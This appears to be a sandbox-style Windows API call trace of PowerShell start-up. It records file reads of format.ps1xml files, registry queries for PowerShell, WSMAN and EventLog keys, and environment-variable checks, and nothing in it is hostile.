	[0771.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0771.119] SetErrorMode (uMode=0x1) returned 0x1
	[0771.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.119] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0771.119] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0771.119] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0771.119] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0771.119] CoTaskMemFree (pv=0x288e990) 
	[0771.120] RegCloseKey (hKey=0x318) returned 0x0
	[0771.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.120] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x81c4283a, Data2=0xb41b, Data3=0x4b8b, Data4=([0]=0xb3, [1]=0xb5, [2]=0x2b, [3]=0x51, [4]=0x4, [5]=0x9c, [6]=0xb, [7]=0xc))) returned 0x0
	[0771.120] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcfc776cc, Data2=0x7ef1, Data3=0x4061, Data4=([0]=0x98, [1]=0x70, [2]=0xaf, [3]=0x8d, [4]=0x9f, [5]=0x3d, [6]=0xcf, [7]=0x9c))) returned 0x0
	[0771.121] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0771.121] GetFileType (hFile=0x318) returned 0x1
	[0771.121] SetErrorMode (uMode=0x1) returned 0x1
	[0771.121] GetFileType (hFile=0x318) returned 0x1
	[0771.121] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.121] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.121] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.122] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.122] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0xe98, lpOverlapped=0x0) returned 1
	[0771.122] ReadFile (in: hFile=0x318, lpBuffer=0x32dd930, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32dd930*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.122] ReadFile (in: hFile=0x318, lpBuffer=0x32de330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32de330*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.122] CloseHandle (hObject=0x318) returned 1
	[0771.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.123] SetErrorMode (uMode=0x1) returned 0x1
	[0771.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0771.123] SetErrorMode (uMode=0x1) returned 0x1
	[0771.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.123] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0771.123] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0771.123] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0771.124] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0771.124] CoTaskMemFree (pv=0x288e990) 
	[0771.124] RegCloseKey (hKey=0x318) returned 0x0
	[0771.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.125] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x535f37ad, Data2=0x3e9d, Data3=0x480b, Data4=([0]=0xaf, [1]=0x18, [2]=0x93, [3]=0xef, [4]=0xb4, [5]=0x25, [6]=0xcc, [7]=0xc3))) returned 0x0
	[0771.125] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x28ef66a2, Data2=0xecab, Data3=0x4739, Data4=([0]=0xb2, [1]=0x19, [2]=0x78, [3]=0x37, [4]=0xfa, [5]=0x89, [6]=0xc6, [7]=0x48))) returned 0x0
	[0771.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0772.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0772.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0772.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0772.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0772.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0772.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0772.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0772.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0772.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0776.629] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.629] CoTaskMemFree (pv=0x3c4320) 
	[0776.631] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.631] CoTaskMemFree (pv=0x3c4320) 
	[0776.633] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.633] CoTaskMemFree (pv=0x3c4320) 
	[0776.634] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.635] CoTaskMemFree (pv=0x3c4320) 
	[0776.642] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.643] CoTaskMemFree (pv=0x3c4320) 
	[0776.651] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.651] CoTaskMemFree (pv=0x3c4320) 
	[0776.653] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0776.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.653] CoTaskMemFree (pv=0x3c4320) 
	[0776.657] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6f8 | out: phkResult=0x1cd6f8*=0x318) returned 0x0
	[0776.658] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.659] CoTaskMemFree (pv=0x0) 
	[0776.659] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0776.659] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x371d50, lpcchValueName=0x1cd6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.659] CoTaskMemFree (pv=0x371d50) 
	[0776.659] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0776.659] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x371d50, lpcchValueName=0x1cd6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.659] CoTaskMemFree (pv=0x371d50) 
	[0776.659] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0776.659] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x371d50, lpcchValueName=0x1cd6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.659] CoTaskMemFree (pv=0x371d50) 
	[0776.660] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd68c, lpData=0x0, lpcbData=0x1cd688*=0x0 | out: lpType=0x1cd68c*=0x1, lpData=0x0, lpcbData=0x1cd688*=0x8) returned 0x0
	[0776.660] CoTaskMemAlloc (cb=0xc) returned 0x3e9140
	[0776.660] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd65c, lpData=0x3e9140, lpcbData=0x1cd658*=0x8 | out: lpType=0x1cd65c*=0x1, lpData="2.0", lpcbData=0x1cd658*=0x8) returned 0x0
	[0776.660] CoTaskMemFree (pv=0x3e9140) 
	[0784.880] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd648 | out: phkResult=0x1cd648*=0x318) returned 0x0
	[0784.880] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd54c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd548*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.880] CoTaskMemFree (pv=0x0) 
	[0784.880] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.880] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x371d50, lpcchValueName=0x1cd5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0784.880] CoTaskMemFree (pv=0x371d50) 
	[0784.880] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.880] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x371d50, lpcchValueName=0x1cd5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0784.881] CoTaskMemFree (pv=0x371d50) 
	[0784.881] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.881] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x371d50, lpcchValueName=0x1cd5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0784.881] CoTaskMemFree (pv=0x371d50) 
	[0784.881] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd5dc, lpData=0x0, lpcbData=0x1cd5d8*=0x0 | out: lpType=0x1cd5dc*=0x1, lpData=0x0, lpcbData=0x1cd5d8*=0x8) returned 0x0
	[0784.881] CoTaskMemAlloc (cb=0xc) returned 0x3e91a0
	[0784.881] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd5ac, lpData=0x3e91a0, lpcbData=0x1cd5a8*=0x8 | out: lpType=0x1cd5ac*=0x1, lpData="2.0", lpcbData=0x1cd5a8*=0x8) returned 0x0
	[0784.881] CoTaskMemFree (pv=0x3e91a0) 
	[0784.882] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0784.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0784.883] CoTaskMemFree (pv=0x3c4320) 
	[0784.888] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0784.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0784.888] CoTaskMemFree (pv=0x3c4320) 
	[0784.894] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd678 | out: phkResult=0x1cd678*=0x320) returned 0x0
	[0784.898] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd5ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd5ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd5e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.898] CoTaskMemFree (pv=0x0) 
	[0784.899] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.899] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.899] CoTaskMemFree (pv=0x371d50) 
	[0784.899] CoTaskMemFree (pv=0x0) 
	[0784.899] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.899] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.899] CoTaskMemFree (pv=0x371d50) 
	[0784.900] CoTaskMemFree (pv=0x0) 
	[0784.900] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.900] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.900] CoTaskMemFree (pv=0x371d50) 
	[0784.900] CoTaskMemFree (pv=0x0) 
	[0784.900] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.900] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.900] CoTaskMemFree (pv=0x371d50) 
	[0784.900] CoTaskMemFree (pv=0x0) 
	[0784.900] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.900] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.900] CoTaskMemFree (pv=0x371d50) 
	[0784.900] CoTaskMemFree (pv=0x0) 
	[0784.900] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.900] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.900] CoTaskMemFree (pv=0x371d50) 
	[0784.901] CoTaskMemFree (pv=0x0) 
	[0784.901] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.901] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.901] CoTaskMemFree (pv=0x371d50) 
	[0784.901] CoTaskMemFree (pv=0x0) 
	[0784.901] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.901] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.901] CoTaskMemFree (pv=0x371d50) 
	[0784.901] CoTaskMemFree (pv=0x0) 
	[0784.901] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0784.901] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x371d50, lpcchName=0x1cd678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0785.743] CoTaskMemFree (pv=0x371d50) 
	[0785.743] CoTaskMemFree (pv=0x0) 
